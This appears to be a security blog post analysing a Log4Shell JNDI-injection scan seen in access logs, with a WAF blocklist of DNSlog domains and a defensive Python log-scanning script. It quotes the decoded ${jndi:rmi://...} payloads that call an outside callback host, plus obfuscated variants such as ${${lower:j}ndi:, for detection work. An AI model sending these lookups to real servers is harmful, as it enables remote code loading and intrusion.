I noticed an IP inside China, 211.139.184.157, scanning the company's domains.
Let's see what its payload is. The raw request as it appeared in the logs (URL-encoded):
/portal/theme/manifest.json?_r=%24%7Bjndi%3Armi%3A%2F%2F120.78.8.33%3A7500%2Fi%2FhcSvqI7U%2F5557c9%2F57ro%2Faw2p%2FPQ5P8iBh%2F%7D&apiversion=%24%7Bjndi%3Armi%3A%2F%2F120.78.8.33%3A7500%2Fi%2FhcSvqI7U%2Fe86b35%2F57ro%2Flc7f%2FPQ5P8iBh%2F%7D
URL-decoding it gives:
/portal/theme/manifest.json?_r=${jndi:rmi://120.78.8.33:7500/i/hcSvqI7U/5557c9/57ro/aw2p/PQ5P8iBh/}&apiversion=${jndi:rmi://120.78.8.33:7500/i/hcSvqI7U/e86b35/57ro/lc7f/PQ5P8iBh/}
Both query parameters carry a ${jndi:rmi://...} lookup, i.e. a Log4j 2 JNDI-injection (Log4Shell, CVE-2021-44228) probe: if a vulnerable Log4j logs either value, the server connects out to the RMI registry at 120.78.8.33:7500, and that callback is how the scanner learns the host is vulnerable.
The back end the attack was launched from is: http://120.78.8.33:7500/cland/#/
Cland Beta (github.com/chaitin/xra…): this is the reverse-connection (out-of-band callback) platform that ships with Chaitin's open-source xray scanner. Note that the two parameters use different path tokens in their rmi:// URLs, which is how such a platform attributes a callback to the exact request and parameter that fired.
This is obviously a security test: scanning from a residential IP while hosting the payload (the callback server) on an Alibaba Cloud host.
Commonly used DNSlog (out-of-band callback) domains:
ceye.io
dnslog.link
dnslog.io
dnslog.cn
hyuga.co
tu4.org
ydscan.net
burpcollaborator.net
dns1.tk
eyes.sh
All of these DNSlog domains can be blocked directly on the WAF. One caveat: a domain blocklist only catches probes that use those public services. The payload above points at a raw IP over rmi://, so it would not have matched any of them. A WAF rule should therefore also match the lookup syntax itself, ${jndi: and its obfuscated forms such as ${${lower:j}ndi: or ${${::-j}ndi:, and the durable fix remains patching Log4j and denying outbound LDAP/RMI/DNS from application servers so a logged lookup cannot call home at all.
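As an added example (not code from the post or from xray), here is a small log-review script that does what the analysis above does by hand: URL-decode each access-log line (including double encoding), collapse the ${lower:...}/${upper:...}/${::-...} lookups attackers use to hide the word "jndi", pull out every JNDI callback target, and flag whether the host is one of the DNSlog domains listed above or a custom callback host like the 120.78.8.33 seen here. The log format, the timestamps and the second and third sample lines are constructed for the example; the first sample line reuses the request and IPs quoted in the post.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Out-of-band (DNSlog) callback domains from the list above; subdomains match too.
DNSLOG_DOMAINS = (
    "ceye.io", "dnslog.link", "dnslog.io", "dnslog.cn", "hyuga.co",
    "tu4.org", "ydscan.net", "burpcollaborator.net", "dns1.tk", "eyes.sh",
)

# Inner lookups Log4j 2 resolves first, commonly used to hide the word "jndi":
# ${lower:j}, ${upper:J} and the default-value form ${::-j}.
_INNER_LOOKUP = re.compile(r"\$\{(?:(?:lower|upper):|::-)([^${}]*)\}", re.IGNORECASE)

# The JNDI lookup itself: ${jndi:<scheme>://<host>[:<port>]/...
_JNDI = re.compile(
    r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s"]+)(?::(?P<port>\d+))?',
    re.IGNORECASE,
)


def normalize(text: str, rounds: int = 3) -> str:
    """URL-decode (repeatedly, to undo double encoding) and collapse nested
    lookups so obfuscated payloads reduce to plain ${jndi:...}."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(rounds):
        collapsed = _INNER_LOOKUP.sub(lambda m: m.group(1), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_dnslog_host(host: str) -> bool:
    """True if host is one of the listed DNSlog services or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in DNSLOG_DOMAINS)


def extract_callbacks(line: str) -> List[Dict[str, object]]:
    """Return every JNDI callback target found in one log line."""
    findings = []
    for m in _JNDI.finditer(normalize(line)):
        host = m.group("host").lower()
        findings.append({
            "scheme": m.group("scheme").lower(),
            "host": host,
            "port": int(m.group("port")) if m.group("port") else None,
            "known_dnslog": is_dnslog_host(host),
        })
    return findings


def scan_log(lines: List[str]) -> List[Tuple[int, List[Dict[str, object]]]]:
    """Return (line_index, findings) for each line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        found = extract_callbacks(line)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample access-log lines. The first is the request quoted in the
# post (its path and IPs are the post's); the other two are made up here.
SAMPLE_LOG = [
    '211.139.184.157 - - [10/Dec/2021:12:00:01 +0800] "GET /portal/theme/manifest.json'
    '?_r=%24%7Bjndi%3Armi%3A%2F%2F120.78.8.33%3A7500%2Fi%2FhcSvqI7U%2F5557c9%2F57ro%2Faw2p%2FPQ5P8iBh%2F%7D'
    '&apiversion=%24%7Bjndi%3Armi%3A%2F%2F120.78.8.33%3A7500%2Fi%2FhcSvqI7U%2Fe86b35%2F57ro%2Flc7f%2FPQ5P8iBh%2F%7D'
    ' HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    # Constructed: obfuscated lookup in the User-Agent, pointing at a DNSlog domain
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0800] "GET / HTTP/1.1" 200 0 "-" '
    '"${${lower:j}ndi:ldap://abc123.dnslog.cn/x}"',
    # Constructed: a benign request to the same path
    '198.51.100.8 - - [10/Dec/2021:12:00:03 +0800] "GET /portal/theme/manifest.json?_r=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, found in scan_log(SAMPLE_LOG):
        for f in found:
            tag = "known DNSlog" if f["known_dnslog"] else "custom callback host"
            print(f"line {idx}: {f['scheme']}://{f['host']}:{f['port']}  ({tag})")
```

Run against real logs, the "custom callback host" hits are the ones a pure domain blocklist would have missed; those hosts (and, for rmi:// and ldap:// targets, the port) are what you feed to egress blocking and to the WAF's lookup-syntax rule.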